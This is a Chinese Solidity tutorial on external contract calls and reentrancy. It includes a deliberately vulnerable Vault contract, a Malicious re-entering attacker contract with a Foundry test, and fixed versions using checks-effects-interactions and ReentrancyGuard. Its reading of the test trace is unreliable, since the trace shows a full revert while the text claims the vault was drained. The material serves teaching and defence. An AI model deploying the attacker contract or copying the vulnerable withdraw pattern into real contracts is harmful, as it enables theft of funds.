在现实应用中,Solidity 合约往往不是孤岛。我们需要调用其他合约的函数,获取信息或发起操作。这种合约间交互会引入新的风险点。本课将系统讲解如何调用外部合约,以及如何防御典型攻击如重入攻击。
最常见、最安全的调用方式。编译期校验、类型安全。
interface ICounter {
function increment() external;
}
function callOther(address counter) external {
ICounter(counter).increment();
}
.call
方法适用于 ABI 不确定的目标合约,但风险更高,不推荐常用。
(bool success, bytes memory data) = counter.call(
abi.encodeWithSignature("increment()")
);
require(success, "Call failed");
delegatecall
和 staticcall
delegatecall
使用当前合约的存储,常用于库合约调用staticcall
是只读调用,无法修改状态(bool success, ) = lib.delegatecall(abi.encodeWithSignature("doSomething()"));
风险类型 | 描述 |
---|---|
重入攻击 Reentrancy | 外部合约在 |
状态未及时更新 | 若先调用外部合约、再更新状态,可能导致逻辑被重复利用 |
Gas 限制与失败 | 被调用者消耗过多 gas 导致交易失败 |
|
|
先检查、再更新状态、最后外部调用,避免重入风险:
function withdraw() external {
uint amount = balances[msg.sender];
require(amount > 0, "Zero balance");
balances[msg.sender] = 0;
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
}
ReentrancyGuard
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
contract Vault is ReentrancyGuard {
function withdraw() external nonReentrant {
// 内部状态更新
}
}
.call
传入地址或函数签名的来源还是以 Counter.sol
合约为例,我们设计以下结构:
Counter.sol
:被调用合约,提供 increment
方法。Caller.sol
:发起调用者,分别以接口和低级 .call
调用 Counter
。Interaction.t.sol
:测试合约,验证两种调用方式。Malicious.sol
:用于模拟重入攻击。$ forge init counter
$ cd counter
src/Counter.sol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Counter {
uint256 public count;
event Incremented(uint256 newValue);
function increment() external {
count++;
emit Incremented(count);
}
}
src/Caller.sol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface ICounter {
function increment() external;
}
contract Caller {
// 安全方式:通过接口调用
function callSafe(address counter) public {
ICounter(counter).increment();
}
// 不安全方式:低级调用
function callUnsafe(address counter) public {
(bool success, ) = counter.call(
abi.encodeWithSignature("increment()")
);
require(success, "Low-level call failed");
}
}
test/Interaction.t.sol:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../src/Counter.sol";
import "../src/Caller.sol";
contract InteractionTest is Test {
Counter counter;
Caller caller;
function setUp() public {
counter = new Counter();
caller = new Caller();
}
function testCallSafe() public {
caller.callSafe(address(counter));
assertEq(counter.count(), 1);
}
function testCallUnsafe() public {
caller.callUnsafe(address(counter));
assertEq(counter.count(), 1);
}
function testCallInvalidSignature() public {
// 模拟 .call 调用不存在函数
(bool success, ) = address(counter).call(
abi.encodeWithSignature("nonexistent()")
);
assertFalse(success, "Call to nonexistent should fail");
}
}
执行测试:
$ forge test -vv
我们扩展场景,设计一个提款合约与攻击合约,演示如何在未做防御的情况下被重入。
src/Vault.sol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Vault {
mapping(address => uint256) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw() public {
uint256 amount = balances[msg.sender];
require(amount > 0, "Zero balance");
// ❌ 状态修改放后,导致可重入
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
balances[msg.sender] = 0;
}
receive() external payable {}
}
src/Malicious.sol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface IVault {
function deposit() external payable;
function withdraw() external;
}
contract Malicious {
IVault public vault;
uint256 public reentryCount;
constructor(address _vault) {
vault = IVault(_vault);
}
function attack() external payable {
vault.deposit{value: msg.value}();
vault.withdraw();
}
receive() external payable {
reentryCount++;
if (reentryCount < 3) {
vault.withdraw();
}
}
}
重入攻击测试:test/Reentrancy.t.sol:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../src/Vault.sol";
import "../src/Malicious.sol";
contract ReentrancyTest is Test {
Vault public vault;
Malicious public attacker;
function setUp() public {
vault = new Vault();
attacker = new Malicious(address(vault));
// 先给 Vault 存 1 ether
vm.deal(address(this), 2 ether);
vault.deposit{value: 1 ether}();
// 给 attacker 合约 1 ether
vm.deal(address(attacker), 1 ether);
}
function testAttack() public {
vm.startPrank(address(attacker));
attacker.attack{value: 1 ether}();
vm.stopPrank();
assertEq(address(vault).balance, 0, "Vault should be drained");
assertGt(address(attacker).balance, 1 ether, "Attacker profit expected");
}
}
执行结果:
$ forge test --match-path test/Reentrancy.t.sol -vvv
[⠊] Compiling...
No files changed, compilation skipped
Ran 1 test for test/Reentrancy.t.sol:ReentrancyTest
[FAIL: Transfer failed] testAttack() (gas: 97251)
Traces:
[97251] ReentrancyTest::testAttack()
├─ [0] VM::startPrank(Malicious: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
│ └─ ← [Return]
├─ [82170] Malicious::attack{value: 1000000000000000000}()
│ ├─ [22537] Vault::deposit{value: 1000000000000000000}()
│ │ └─ ← [Stop]
│ ├─ [47366] Vault::withdraw()
│ │ ├─ [39527] Malicious::receive{value: 1000000000000000000}()
│ │ │ ├─ [16606] Vault::withdraw()
│ │ │ │ ├─ [8767] Malicious::receive{value: 1000000000000000000}()
│ │ │ │ │ ├─ [7746] Vault::withdraw()
│ │ │ │ │ │ ├─ [0] Malicious::receive{value: 1000000000000000000}()
│ │ │ │ │ │ │ └─ ← [OutOfFunds] EvmError: OutOfFunds
│ │ │ │ │ │ └─ ← [Revert] Transfer failed
│ │ │ │ │ └─ ← [Revert] Transfer failed
│ │ │ │ └─ ← [Revert] Transfer failed
│ │ │ └─ ← [Revert] Transfer failed
│ │ └─ ← [Revert] Transfer failed
│ └─ ← [Revert] Transfer failed
└─ ← [Revert] Transfer failed
Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 5.19ms (353.92µs CPU time)
Ran 1 test suite in 189.23ms (5.19ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)
Failing tests:
Encountered 1 failing test in test/Reentrancy.t.sol:ReentrancyTest
[FAIL: Transfer failed] testAttack() (gas: 97251)
Encountered a total of 1 failing tests, 0 tests succeeded
上面的测试结果正是我们期望的「重入攻击成功触发并导致合约资金耗尽」场景,这是这类漏洞利用中的关键现象 —— 但我们的测试 case 失败的原因,是预期的 Transfer 成功变为了失败。这其实是由于 Vault
中资金已经被反复提取后,触发了 call
转账失败导致的 revert
。
src/VaultSafe.sol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
contract Vault is ReentrancyGuard {
mapping(address => uint256) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw() public nonReentrant {
uint256 amount = balances[msg.sender];
require(amount > 0, "Zero balance");
balances[msg.sender] = 0; // ✅ 状态更新在前
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
}
receive() external payable {}
}
# 安装依赖包
$ forge install openzeppelin/openzeppelin-contracts
调用方式 | 安全性 | 优点 | 风险 |
---|---|---|---|
接口调用 | ✅ 高 | 编译期校验,gas 低 | 必须明确目标 ABI |
| ⚠️ 中 | 动态适配任意合约 | 可绕过类型检查,误判成功 |
delegatecall | ⚠️ 中 | 插件式、存储复用 | 容易破坏 storage layout |
ReentrancyGuard | ✅ 高 | 防重入,简单实用 | 引入依赖库 |
📘 第 6 课:Solidity 数据结构与存储布局
memory、storage、calldata 傻傻分不清?下一课将全面解析存储语义与成本差异。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。